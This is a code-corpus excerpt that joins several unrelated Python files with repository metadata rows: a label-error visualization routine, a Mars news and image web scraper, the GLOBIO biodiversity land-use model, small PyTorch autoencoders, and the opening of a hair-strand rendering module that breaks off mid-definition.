inf_ar = np.asarray(Image.open(os.path.join(cfg.INFERENCE_OUTPUT_DIR, fn + "." + inf_mask_suffix)), dtype="uint8")
gt_mask_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
net_input_suffix = os.listdir(cfg.NET_INPUT_DIR)[0].split(".")[-1]
gt_mask = np.array(Image.open(os.path.join(cfg.GT_MASKS_DIR, fn + "." + gt_mask_suffix)))
net_input = np.array(Image.open(os.path.join(cfg.NET_INPUT_DIR, fn + "." + net_input_suffix)))
Dataset = getattr(labels, cfg.DATASET.capitalize())
trainId2color = Dataset.trainId2color
trainId2name = Dataset.trainId2name
num_classes = Dataset.num_classes
gt_rgb = np.zeros(inf_ar.shape + (3,), dtype="uint8")
pred_rgb = np.zeros(inf_ar.shape + (3,), dtype="uint8")
for id in range(num_classes):
gt_rgb[gt_mask==id] = trainId2color[id]
pred_rgb[inf_ar==id] = trainId2color[id]
rgb_blend_img = np.copy(net_input)
components = np.load(os.path.join(cfg.COMPONENTS_DIR, fn + "_components.npy"))
seg_idx = np.where(np.abs(components)==seg_id)
bbox_0 = (max(np.min(seg_idx[1])-15, 0), max(np.min(seg_idx[0])-15, 0))
bbox_1 = (min(np.max(seg_idx[1])+15, rgb_blend_img.shape[1]), min(np.max(seg_idx[0])+15, rgb_blend_img.shape[1]))
rgb_blend_img[seg_idx] = 0.4*rgb_blend_img[seg_idx] + 0.6*pred_rgb[seg_idx]
img_shape = rgb_blend_img.shape[0]
net_input = Image.fromarray(net_input)
rgb_blend_img = Image.fromarray(rgb_blend_img)
gt_rgb_img = Image.fromarray(gt_rgb)
pred_rgb_img = Image.fromarray(pred_rgb)
font = ImageFont.truetype("arial.ttf", size=int(0.05*img_shape))
draw = ImageDraw.Draw(rgb_blend_img)
draw.rectangle([bbox_0, bbox_1], outline='red', width=4)
draw.text((0, 0), "Predicted Label: " + trainId2name[int(cls_id)], fill='red', font=font)
draw = ImageDraw.Draw(net_input)
draw.rectangle([bbox_0, bbox_1], outline='red', width=4)
draw.text((0, 0), "Ground Truth", fill='red', font=font)
draw = ImageDraw.Draw(gt_rgb_img)
draw.rectangle([bbox_0, bbox_1], outline='white', width=4)
draw = ImageDraw.Draw(pred_rgb_img)
draw.rectangle([bbox_0, bbox_1], outline='white', width=4)
out_img = Image.new('RGB', (2*rgb_blend_img.width, 2*rgb_blend_img.height))
out_img.paste(net_input, (0, 0))
out_img.paste(rgb_blend_img, (0, net_input.height))
out_img.paste(gt_rgb_img, (net_input.width, 0))
out_img.paste(pred_rgb_img, (net_input.width, net_input.height))
saved = False
i = 0
while not saved:
try:
open(os.path.join(cfg.ERROR_PROPOSAL_DIR, fn + f"_proposal_{i}." + net_input_suffix))
i += 1
except IOError:
out_img.save(os.path.join(cfg.ERROR_PROPOSAL_DIR, fn + f"_proposal_{i}." + net_input_suffix))
saved = True | mrcoee/Automatic-Label-Error-Detection | src/visualization.py | visualization.py | py | 4,667 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros_like",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.label",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"l... |
7244240814 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
# Dependencies
import os
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
from webdriver_manager.chrome import ChromeDriverManager
# In[2]:
def init_browser():
#set the chromedriver path
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
def scrape():
browser = init_browser()
mars_dict={}
# In[3]:
url = "https://redplanetscience.com/"
browser.visit(url)
# In[4]:
html = browser.html
soup = BeautifulSoup(html, "html.parser")
# # NASA Mars News
# Scrape the Mars News Site and collect the latest News Title and Paragraph Text. Assign the text to variables that you can reference later.
# In[5]:
news_title = soup.find_all('div', class_ ='content_title')[0].text
news_p = soup.find_all('div', class_ ='article_teaser_body')[0].text
print(news_title)
print(news_p)
# In[6]:
browser.quit()
# # JPL Mars Space Images - Featured Image
# In[7]:
# Visit the following URL
#set the chromedriver path
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
url = "https://spaceimages-mars.com/"
browser.visit(url)
# In[8]:
#Use splinter to navigate the site and find the image url for the current Featured Mars Image and
#assign the url string to a variable called featured_image_url.
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
image = soup.find("img", class_="headerimage fade-in")["src"]
featured_image_url = url + image
featured_image_url
# In[9]:
browser.quit()
# # Mars Facts
# In[10]:
#Use Pandas to scrape the table containing facts about the planet
url = 'https://space-facts.com/mars/'
tables_facts = pd.read_html(url)
tables_facts
# In[11]:
#Convert data to dataframe
facts_df = tables_facts[0]
facts_df.columns = ['Parameter', 'Value']
facts_df
# In[12]:
#Convert the data to a HTML table string
html = facts_df.to_html()
print(html)
# # Mars Hemispheres
# In[13]:
#Visit Mars Hemispheres url to obtain high resolution images for each of Mar's hemispheres.
#set the chromedriver path
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
hemis_url = "https://marshemispheres.com/"
browser.visit(hemis_url)
# In[14]:
# Collect the urls by clicking each of the links to the hemispheres
#Retrieve the titles and urls and append to list
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
hemispheres = soup.find_all('div', class_='item')
hemisphere_image_urls = {}
hemisph_title = []
img_urls = []
for hemisphere in hemispheres:
title = hemisphere.find('h3').text
main_url = hemis_url + hemisphere.find('a')['href']
browser.visit(main_url)
img_html = browser.html
soup = BeautifulSoup(img_html, 'html.parser')
image_url = hemis_url + soup.find('img', class_='wide-image')['src']
hemisphere_image_urls = {
"title" : title,
"img_url" : image_url
}
print(hemisphere_image_urls)
# In[15]:
browser.quit()
| mshi2/web-scraping-challenge | Missions_to_Mars/scrape_mars.py | scrape_mars.py | py | 3,178 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "splinter.Browser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "splinter.Browser",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup... |
30323488487 | """GLOBIO InVEST Model"""
import os
import logging
import gdal
import osr
import numpy
import pygeoprocessing
logging.basicConfig(format='%(asctime)s %(name)-20s %(levelname)-8s \
%(message)s', level=logging.DEBUG, datefmt='%m/%d/%Y %H:%M:%S ')
LOGGER = logging.getLogger('invest_natcap.globio.globio')
def execute(args):
"""main execute entry point"""
#append a _ to the suffix if it's not empty and doens't already have one
try:
file_suffix = args['results_suffix']
if file_suffix != "" and not file_suffix.startswith('_'):
file_suffix = '_' + file_suffix
except KeyError:
file_suffix = ''
pygeoprocessing.geoprocessing.create_directories([args['workspace_dir']])
if not args['predefined_globio']:
out_pixel_size = pygeoprocessing.geoprocessing.get_cell_size_from_uri(
args['lulc_uri'])
else:
out_pixel_size = pygeoprocessing.geoprocessing.get_cell_size_from_uri(
args['globio_lulc_uri'])
if not args['predefined_globio']:
#reclassify the landcover map
lulc_to_globio_table = pygeoprocessing.geoprocessing.get_lookup_from_table(
args['lulc_to_globio_table_uri'], 'lucode')
lulc_to_globio = dict(
[(lulc_code, int(table['globio_lucode'])) for
(lulc_code, table) in lulc_to_globio_table.items()])
intermediate_globio_lulc_uri = os.path.join(
args['workspace_dir'], 'intermediate_globio_lulc%s.tif' % file_suffix)
globio_nodata = -1
pygeoprocessing.geoprocessing.reclassify_dataset_uri(
args['lulc_uri'], lulc_to_globio, intermediate_globio_lulc_uri,
gdal.GDT_Int32, globio_nodata, exception_flag='values_required')
globio_lulc_uri = os.path.join(
args['workspace_dir'], 'globio_lulc%s.tif' % file_suffix)
sum_yieldgap_uri = args['sum_yieldgap_uri']
potential_vegetation_uri = args['potential_vegetation_uri']
pasture_uri = args['pasture_uri']
#smoothed natural areas are natural areas run through a gaussian filter
natural_areas_uri = os.path.join(
args['workspace_dir'], 'natural_areas%s.tif' % file_suffix)
natural_areas_nodata = -1
def natural_area_mask_op(lulc_array):
"""masking out natural areas"""
nodata_mask = lulc_array == globio_nodata
result = (
(lulc_array == 130) | (lulc_array == 1))
return numpy.where(nodata_mask, natural_areas_nodata, result)
LOGGER.info("create mask of natural areas")
pygeoprocessing.geoprocessing.vectorize_datasets(
[intermediate_globio_lulc_uri], natural_area_mask_op,
natural_areas_uri, gdal.GDT_Int32, natural_areas_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
LOGGER.info('gaussian filter natural areas')
sigma = 9.0
gaussian_kernel_uri = os.path.join(
args['workspace_dir'], 'gaussian_kernel%s.tif' % file_suffix)
make_gaussian_kernel_uri(sigma, gaussian_kernel_uri)
smoothed_natural_areas_uri = os.path.join(
args['workspace_dir'], 'smoothed_natural_areas%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.convolve_2d_uri(
natural_areas_uri, gaussian_kernel_uri, smoothed_natural_areas_uri)
ffqi_uri = os.path.join(
args['workspace_dir'], 'ffqi%s.tif' % file_suffix)
def ffqi_op(natural_areas_array, smoothed_natural_areas):
"""mask out ffqi only where there's an ffqi"""
return numpy.where(
natural_areas_array != natural_areas_nodata,
natural_areas_array * smoothed_natural_areas,
natural_areas_nodata)
LOGGER.info('calculate ffqi')
pygeoprocessing.geoprocessing.vectorize_datasets(
[natural_areas_uri, smoothed_natural_areas_uri], ffqi_op,
ffqi_uri, gdal.GDT_Float32, natural_areas_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
#remap globio lulc to an internal lulc based on ag and yield gaps
#these came from the 'expansion_scenarios.py' script as numbers Justin
#provided way back on the unilever project.
high_intensity_agriculture_threshold = float(args['high_intensity_agriculture_threshold'])
pasture_threshold = float(args['pasture_threshold'])
yieldgap_threshold = float(args['yieldgap_threshold'])
primary_threshold = float(args['primary_threshold'])
sum_yieldgap_nodata = pygeoprocessing.geoprocessing.get_nodata_from_uri(
args['sum_yieldgap_uri'])
potential_vegetation_nodata = (
pygeoprocessing.geoprocessing.get_nodata_from_uri(
args['potential_vegetation_uri']))
pasture_nodata = pygeoprocessing.geoprocessing.get_nodata_from_uri(
args['pasture_uri'])
def create_globio_lulc(
lulc_array, sum_yieldgap, potential_vegetation_array, pasture_array,
ffqi):
#Step 1.2b: Assign high/low according to threshold based on yieldgap.
nodata_mask = lulc_array == globio_nodata
high_low_intensity_agriculture = numpy.where(
sum_yieldgap < yieldgap_threshold *
high_intensity_agriculture_threshold, 9.0, 8.0)
#Step 1.2c: Stamp ag_split classes onto input LULC
lulc_ag_split = numpy.where(
lulc_array == 132.0, high_low_intensity_agriculture, lulc_array)
nodata_mask = nodata_mask | (lulc_array == globio_nodata)
#Step 1.3a: Split Scrublands and grasslands into pristine
#vegetations, livestock grazing areas, and man-made pastures.
three_types_of_scrubland = numpy.where(
(potential_vegetation_array <= 8) & (lulc_ag_split == 131), 6.0,
5.0)
three_types_of_scrubland = numpy.where(
(three_types_of_scrubland == 5.0) &
(pasture_array < pasture_threshold), 1.0,
three_types_of_scrubland)
#Step 1.3b: Stamp ag_split classes onto input LULC
broad_lulc_shrub_split = numpy.where(
lulc_ag_split == 131, three_types_of_scrubland, lulc_ag_split)
#Step 1.4a: Split Forests into Primary, Secondary
four_types_of_forest = numpy.empty(lulc_array.shape)
#1.0 is primary forest
four_types_of_forest[(ffqi >= primary_threshold)] = 1
#3 is secondary forest
four_types_of_forest[(ffqi < primary_threshold)] = 3
#Step 1.4b: Stamp ag_split classes onto input LULC
globio_lulc = numpy.where(
broad_lulc_shrub_split == 130, four_types_of_forest,
broad_lulc_shrub_split) #stamp primary vegetation
return numpy.where(nodata_mask, globio_nodata, globio_lulc)
LOGGER.info('create the globio lulc')
pygeoprocessing.geoprocessing.vectorize_datasets(
[intermediate_globio_lulc_uri, sum_yieldgap_uri,
potential_vegetation_uri, pasture_uri, ffqi_uri],
create_globio_lulc, globio_lulc_uri, gdal.GDT_Int32, globio_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
else:
LOGGER.info('no need to calcualte GLOBIO LULC because it is passed in')
globio_lulc_uri = args['globio_lulc_uri']
globio_nodata = pygeoprocessing.get_nodata_from_uri(globio_lulc_uri)
"""This is from Justin's old code:
#Step 1.2b: Assign high/low according to threshold based on yieldgap.
#high_low_intensity_agriculture_uri = args["export_folder"]+"high_low_intensity_agriculture_"+args['run_id']+".tif"
high_intensity_agriculture_threshold = 1 #hardcode for now until UI is determined. Eventually this is a user input. Do I bring it into the ARGS dict?
high_low_intensity_agriculture = numpy.where(sum_yieldgap < float(args['yieldgap_threshold']*high_intensity_agriculture_threshold), 9.0, 8.0) #45. = average yieldgap on global cells with nonzero yieldgap.
#Step 1.2c: Stamp ag_split classes onto input LULC
broad_lulc_ag_split = numpy.where(broad_lulc_array==132.0, high_low_intensity_agriculture, broad_lulc_array)
#Step 1.3a: Split Scrublands and grasslands into pristine vegetations,
#livestock grazing areas, and man-made pastures.
three_types_of_scrubland = numpy.zeros(scenario_lulc_array.shape)
potential_vegetation_array = geotiff_to_array(aligned_agriculture_uris[0])
three_types_of_scrubland = numpy.where((potential_vegetation_array <= 8) & (broad_lulc_ag_split== 131), 6.0, 5.0) # < 8 min potential veg means should have been forest, 131 in broad is grass, so 1.0 implies man made pasture
pasture_array = geotiff_to_array(aligned_agriculture_uris[1])
three_types_of_scrubland = numpy.where((three_types_of_scrubland == 5.0) & (pasture_array < args['pasture_threshold']), 1.0, three_types_of_scrubland)
#Step 1.3b: Stamp ag_split classes onto input LULC
broad_lulc_shrub_split = numpy.where(broad_lulc_ag_split==131, three_types_of_scrubland, broad_lulc_ag_split)
#Step 1.4a: Split Forests into Primary, Secondary, Lightly Used and Plantation.
sigma = 9
primary_threshold = args['primary_threshold']
secondary_threshold = args['secondary_threshold']
is_natural = (broad_lulc_shrub_split == 130) | (broad_lulc_shrub_split == 1)
blurred = scipy.ndimage.filters.gaussian_filter(is_natural.astype(float), sigma, mode='constant', cval=0.0)
ffqi = blurred * is_natural
four_types_of_forest = numpy.empty(scenario_lulc_array.shape)
four_types_of_forest[(ffqi >= primary_threshold)] = 1.0
four_types_of_forest[(ffqi < primary_threshold) & (ffqi >= secondary_threshold)] = 3.0
four_types_of_forest[(ffqi < secondary_threshold)] = 4.0
#Step 1.4b: Stamp ag_split classes onto input LULC
globio_lulc = numpy.where(broad_lulc_shrub_split == 130 ,four_types_of_forest, broad_lulc_shrub_split) #stamp primary vegetation
return globio_lulc"""
#load the infrastructure layers from disk
infrastructure_filenames = []
infrastructure_nodata_list = []
for root_directory, _, filename_list in os.walk(
args['infrastructure_dir']):
for filename in filename_list:
LOGGER.debug(filename)
if filename.lower().endswith(".tif"):
LOGGER.debug("tiff added %s", filename)
infrastructure_filenames.append(
os.path.join(root_directory, filename))
infrastructure_nodata_list.append(
pygeoprocessing.geoprocessing.get_nodata_from_uri(
infrastructure_filenames[-1]))
if filename.lower().endswith(".shp"):
LOGGER.debug("shape added %s", filename)
infrastructure_tmp_raster = (
os.path.join(args['workspace_dir'], os.path.basename(filename.lower() + ".tif")))
pygeoprocessing.geoprocessing.new_raster_from_base_uri(
globio_lulc_uri, infrastructure_tmp_raster,
'GTiff', -1.0, gdal.GDT_Int32, fill_value=0)
pygeoprocessing.geoprocessing.rasterize_layer_uri(
infrastructure_tmp_raster,
os.path.join(root_directory, filename), burn_values=[1],
option_list=["ALL_TOUCHED=TRUE"])
infrastructure_filenames.append(infrastructure_tmp_raster)
infrastructure_nodata_list.append(
pygeoprocessing.geoprocessing.get_nodata_from_uri(
infrastructure_filenames[-1]))
if len(infrastructure_filenames) == 0:
raise ValueError(
"infrastructure directory didn't have any GeoTIFFS or "
"Shapefiles at %s", args['infrastructure_dir'])
infrastructure_nodata = -1
infrastructure_uri = os.path.join(
args['workspace_dir'], 'combined_infrastructure%s.tif' % file_suffix)
def collapse_infrastructure_op(*infrastructure_array_list):
"""Combines all input infrastructure into a single map where if any
pixel on the stack is 1 gets passed through, any nodata pixel
masks out all of them"""
nodata_mask = (
infrastructure_array_list[0] == infrastructure_nodata_list[0])
infrastructure_result = infrastructure_array_list[0] > 0
for index in range(1, len(infrastructure_array_list)):
current_nodata = (
infrastructure_array_list[index] ==
infrastructure_nodata_list[index])
infrastructure_result = (
infrastructure_result |
((infrastructure_array_list[index] > 0) & ~current_nodata))
nodata_mask = (
nodata_mask & current_nodata)
return numpy.where(
nodata_mask, infrastructure_nodata, infrastructure_result)
LOGGER.info('collapse infrastructure into one raster')
pygeoprocessing.geoprocessing.vectorize_datasets(
infrastructure_filenames, collapse_infrastructure_op,
infrastructure_uri, gdal.GDT_Byte, infrastructure_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
#calc_msa_f
primary_veg_mask_uri = os.path.join(
args['workspace_dir'], 'primary_veg_mask%s.tif' % file_suffix)
primary_veg_mask_nodata = -1
def primary_veg_mask_op(lulc_array):
"""masking out natural areas"""
nodata_mask = lulc_array == globio_nodata
result = (lulc_array == 1)
return numpy.where(nodata_mask, primary_veg_mask_nodata, result)
LOGGER.info("create mask of primary veg areas")
pygeoprocessing.geoprocessing.vectorize_datasets(
[globio_lulc_uri], primary_veg_mask_op,
primary_veg_mask_uri, gdal.GDT_Int32, primary_veg_mask_nodata,
out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
LOGGER.info('gaussian filter primary veg')
sigma = 9.0
gaussian_kernel_uri = os.path.join(
args['workspace_dir'], 'gaussian_kernel%s.tif' % file_suffix)
make_gaussian_kernel_uri(sigma, gaussian_kernel_uri)
smoothed_primary_veg_mask_uri = os.path.join(
args['workspace_dir'], 'smoothed_primary_veg_mask%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.convolve_2d_uri(
primary_veg_mask_uri, gaussian_kernel_uri, smoothed_primary_veg_mask_uri)
primary_veg_smooth_uri = os.path.join(
args['workspace_dir'], 'ffqi%s.tif' % file_suffix)
def primary_veg_smooth_op(primary_veg_mask_array, smoothed_primary_veg_mask):
"""mask out ffqi only where there's an ffqi"""
return numpy.where(
primary_veg_mask_array != primary_veg_mask_nodata,
primary_veg_mask_array * smoothed_primary_veg_mask,
primary_veg_mask_nodata)
LOGGER.info('calculate primary_veg_smooth')
pygeoprocessing.geoprocessing.vectorize_datasets(
[primary_veg_mask_uri, smoothed_primary_veg_mask_uri],
primary_veg_smooth_op, primary_veg_smooth_uri, gdal.GDT_Float32,
primary_veg_mask_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, assert_datasets_projected=False,
vectorize_op=False)
msa_nodata = -1
def msa_f_op(primary_veg_smooth):
"""calcualte msa fragmentation"""
nodata_mask = primary_veg_mask_nodata == primary_veg_smooth
msa_f = numpy.empty(primary_veg_smooth.shape)
msa_f[:] = 1.0
#These thresholds come from FFQI from Justin's code; I don't
#know where they otherwise came from.
msa_f[(primary_veg_smooth > .9825) & (primary_veg_smooth <= .9984)] = 0.95
msa_f[(primary_veg_smooth > .89771) & (primary_veg_smooth <= .9825)] = 0.90
msa_f[(primary_veg_smooth > .578512) & (primary_veg_smooth <= .89771)] = 0.7
msa_f[(primary_veg_smooth > .42877) & (primary_veg_smooth <= .578512)] = 0.6
msa_f[(primary_veg_smooth <= .42877)] = 0.3
msa_f[nodata_mask] = msa_nodata
return msa_f
LOGGER.info('calculate msa_f')
msa_f_uri = os.path.join(args['workspace_dir'], 'msa_f%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.vectorize_datasets(
[primary_veg_smooth_uri], msa_f_op, msa_f_uri, gdal.GDT_Float32,
msa_nodata, out_pixel_size, "intersection", dataset_to_align_index=0,
assert_datasets_projected=False, vectorize_op=False)
#calc_msa_i
infrastructure_impact_zones = {
'no impact': 1.0,
'low impact': 0.9,
'medium impact': 0.8,
'high impact': 0.4
}
def msa_i_op(lulc_array, distance_to_infrastructure):
"""calculate msa infrastructure"""
msa_i_tropical_forest = numpy.empty(lulc_array.shape)
distance_to_infrastructure *= out_pixel_size #convert to meters
msa_i_tropical_forest[:] = infrastructure_impact_zones['no impact']
msa_i_tropical_forest[(distance_to_infrastructure > 4000.0) & (distance_to_infrastructure <= 14000.0)] = infrastructure_impact_zones['low impact']
msa_i_tropical_forest[(distance_to_infrastructure > 1000.0) & (distance_to_infrastructure <= 4000.0)] = infrastructure_impact_zones['medium impact']
msa_i_tropical_forest[(distance_to_infrastructure <= 1000.0)] = infrastructure_impact_zones['high impact']
msa_i_temperate_and_boreal_forest = numpy.empty(lulc_array.shape)
msa_i_temperate_and_boreal_forest[:] = infrastructure_impact_zones['no impact']
msa_i_temperate_and_boreal_forest[(distance_to_infrastructure > 1200.0) & (distance_to_infrastructure <= 4200.0)] = infrastructure_impact_zones['low impact']
msa_i_temperate_and_boreal_forest[(distance_to_infrastructure > 300.0) & (distance_to_infrastructure <= 1200.0)] = infrastructure_impact_zones['medium impact']
msa_i_temperate_and_boreal_forest[(distance_to_infrastructure <= 300.0)] = infrastructure_impact_zones['high impact']
msa_i_cropland_and_grassland = numpy.empty(lulc_array.shape)
msa_i_cropland_and_grassland[:] = infrastructure_impact_zones['no impact']
msa_i_cropland_and_grassland[(distance_to_infrastructure > 2000.0) & (distance_to_infrastructure <= 7000.0)] = infrastructure_impact_zones['low impact']
msa_i_cropland_and_grassland[(distance_to_infrastructure > 500.0) & (distance_to_infrastructure <= 2000.0)] = infrastructure_impact_zones['medium impact']
msa_i_cropland_and_grassland[(distance_to_infrastructure <= 500.0)] = infrastructure_impact_zones['high impact']
msa_i = numpy.where((lulc_array >= 1) & (lulc_array <= 5), msa_i_temperate_and_boreal_forest, infrastructure_impact_zones['no impact'])
msa_i = numpy.where((lulc_array >= 6) & (lulc_array <= 12), msa_i_cropland_and_grassland, msa_i)
return msa_i
LOGGER.info('calculate msa_i')
distance_to_infrastructure_uri = os.path.join(
args['workspace_dir'], 'distance_to_infrastructure%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.distance_transform_edt(
infrastructure_uri, distance_to_infrastructure_uri)
msa_i_uri = os.path.join(args['workspace_dir'], 'msa_i%s.tif' % file_suffix)
pygeoprocessing.geoprocessing.vectorize_datasets(
[globio_lulc_uri, distance_to_infrastructure_uri], msa_i_op, msa_i_uri,
gdal.GDT_Float32, msa_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, assert_datasets_projected=False,
vectorize_op=False)
#calc_msa_lu
lu_msa_lookup = {
0.0: 0.0, #map 0 to 0
1.0: 1.0, #primary veg
2.0: 0.7, #lightly used natural forest
3.0: 0.5, #secondary forest
4.0: 0.2, #forest plantation
5.0: 0.7, #livestock grazing
6.0: 0.1, #man-made pastures
7.0: 0.5, #agroforesty
8.0: 0.3, #low-input agriculture
9.0: 0.1, #intenstive agriculture
10.0: 0.05, #built-up areas
}
msa_lu_uri = os.path.join(
args['workspace_dir'], 'msa_lu%s.tif' % file_suffix)
LOGGER.info('calculate msa_lu')
pygeoprocessing.geoprocessing.reclassify_dataset_uri(
globio_lulc_uri, lu_msa_lookup, msa_lu_uri,
gdal.GDT_Float32, globio_nodata, exception_flag='values_required')
LOGGER.info('calculate msa')
msa_uri = os.path.join(
args['workspace_dir'], 'msa%s.tif' % file_suffix)
def msa_op(msa_f, msa_lu, msa_i):
return numpy.where(
msa_f != globio_nodata, msa_f* msa_lu * msa_i, globio_nodata)
pygeoprocessing.geoprocessing.vectorize_datasets(
[msa_f_uri, msa_lu_uri, msa_i_uri], msa_op, msa_uri,
gdal.GDT_Float32, msa_nodata, out_pixel_size, "intersection",
dataset_to_align_index=0, assert_datasets_projected=False,
vectorize_op=False)
#calc msa msa = msa_f[tail_type] * msa_lu[tail_type] * msa_i[tail_type]
def make_gaussian_kernel_uri(sigma, kernel_uri):
"""create a gaussian kernel raster"""
max_distance = sigma * 5
kernel_size = int(numpy.round(max_distance * 2 + 1))
driver = gdal.GetDriverByName('GTiff')
kernel_dataset = driver.Create(
kernel_uri.encode('utf-8'), kernel_size, kernel_size, 1,
gdal.GDT_Float32, options=['BIGTIFF=IF_SAFER'])
#Make some kind of geotransform, it doesn't matter what but
#will make GIS libraries behave better if it's all defined
kernel_dataset.SetGeoTransform([444720, 30, 0, 3751320, 0, -30])
srs = osr.SpatialReference()
srs.SetUTM(11, 1)
srs.SetWellKnownGeogCS('NAD27')
kernel_dataset.SetProjection(srs.ExportToWkt())
kernel_band = kernel_dataset.GetRasterBand(1)
kernel_band.SetNoDataValue(-9999)
col_index = numpy.array(xrange(kernel_size))
integration = 0.0
for row_index in xrange(kernel_size):
kernel = numpy.exp(
-((row_index - max_distance)**2 +
(col_index - max_distance) ** 2)/(2.0*sigma**2)).reshape(
1, kernel_size)
integration += numpy.sum(kernel)
kernel_band.WriteArray(kernel, xoff=0, yoff=row_index)
for row_index in xrange(kernel_size):
kernel_row = kernel_band.ReadAsArray(
xoff=0, yoff=row_index, win_xsize=kernel_size, win_ysize=1)
kernel_row /= integration
kernel_band.WriteArray(kernel_row, 0, row_index)
| natcap/invest-natcap.invest-3 | invest_natcap/globio/globio.py | globio.py | py | 23,365 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "logging.getLogger",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pygeoprocess... |
74157719464 | from torch import nn
class AE_Deconv(nn.Module):
def __init__(self, input_dim: int = 63, latent_dim: int = 16):
super().__init__()
assert latent_dim < 32
self.encoder = nn.Sequential(
nn.Linear(input_dim, 32),
nn.BatchNorm1d(32),
nn.ReLU(True),
nn.Linear(32, latent_dim),
nn.BatchNorm1d(latent_dim),
nn.ReLU(True),
# nn.Dropout2d(p=0.2),
)
self.projector = nn.Sequential(
nn.Linear(latent_dim, 32), nn.ReLU(True), nn.Linear(32, 64), nn.ReLU(True)
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(16, 8, kernel_size=(5, 6), stride=2), # C=8,H=11,W=19
nn.ReLU(),
nn.ConvTranspose2d(
8, 4, kernel_size=(3, 5), stride=2, output_padding=(0, 1)
),
nn.ReLU(),
nn.ConvTranspose2d(
4, 2, kernel_size=(3, 4), stride=2, output_padding=(0, 0)
),
nn.ReLU(),
nn.ConvTranspose2d(
2, 1, kernel_size=(3, 3), stride=2, output_padding=(1, 1)
),
)
def forward(self, x):
embedding = self.encoder(x)
z = self.projector(embedding)
z = z.view(z.size(0), 16, 2, -1) # Reshape to (bs, 16, 2, 2)
return self.decoder(z)
class AE(nn.Module):
def __init__(self, input_dim: int = 63, latent_dim: int = 16):
super().__init__()
assert latent_dim < 32
self.encoder = nn.Sequential(
nn.Linear(input_dim, 32),
# nn.BatchNorm1d(32),
nn.ReLU(True),
nn.Linear(32, latent_dim),
# nn.BatchNorm1d(latent_dim),
nn.ReLU(True),
# nn.Tanh(),
# nn.Dropout2d(p=0.2),
)
self.decoder = nn.Sequential(
nn.Linear(latent_dim, 32),
nn.ReLU(True),
nn.Linear(32, 64),
nn.ReLU(True),
nn.Linear(64, 128),
nn.ReLU(True),
nn.Linear(128, 512),
nn.ReLU(True),
nn.Linear(512, 1024),
nn.ReLU(True),
nn.Linear(1024, 2048),
nn.ReLU(True),
nn.Linear(2048, 6880),
)
def forward(self, x):
z = self.encoder(x)
y_hat = self.decoder(z)
return y_hat.view(y_hat.size(0), 1, 80, 86)
def encode(self, x):
return self.encoder(x)
| DanBigioi/Sign2Speech | src/models/components/autoencoder.py | autoencoder.py | py | 2,475 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 4,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
22349295595 | import sys
import os
from npbgpp.npbgplusplus.modeling.refiner.unet import RefinerUNet
from pytorch3d.io import load_obj, load_ply, save_obj
import cv2
import numpy as np
import pickle
import torch
import torch.nn as nn
import torch.nn.functional as F
import trimesh
import yaml
from .quad_rasterizer import QuadRasterizer
from NeuS.models.dataset import load_K_Rt_from_P
from src.utils.util import tensor2image
from src.utils.geometry import project_orient_to_camera, soft_interpolate, hard_interpolate
class Renderer(nn.Module):
def __init__(
self,
config,
device='cuda',
save_dir='strands_rasterizer'
):
super(Renderer, self).__init__()
self.image_size = config.get('image_size', 512)
self.out_channels = config.get('out_channels', -1)
self.logging_freq = config.get('logging_freq', 5000)
self.feat_size = config.get('feat_size', -1)
self.num_strands = config.get('num_strands', -1)
self.use_orients_cond = config.get('use_orients_cond', False)
self.use_silh = config.get('use_silh', False)
self.device = device
# Load head mesh for occlusion
if config.get('mesh_path', -1).split('.')[-1] == 'obj':
verts, faces, _ = load_obj(config.get('mesh_path', -1))
occlusion_faces = faces.verts_idx
else:
verts, faces = load_ply(config.get('mesh_path', -1))
occlusion_faces = faces
verts = verts.to(self.device)
occlusion_faces = occlusion_faces.to(self.device)
# Init rasterizers and renderers
self.rasterizer = QuadRasterizer(
render_size=self.image_size,
feats_dim=self.feat_size + self.use_silh,
head_mesh=(verts, occlusion_faces),
use_silh=self.use_silh,
use_orients_cond=self.use_orients_cond,
).to(self.device)
self.refiner_unet = RefinerUNet(
conv_block='gated',
num_input_channels=self.feat_size + 4 * self.use_orients_cond ,
feature_scale=4,
num_output_channels=self.out_channels
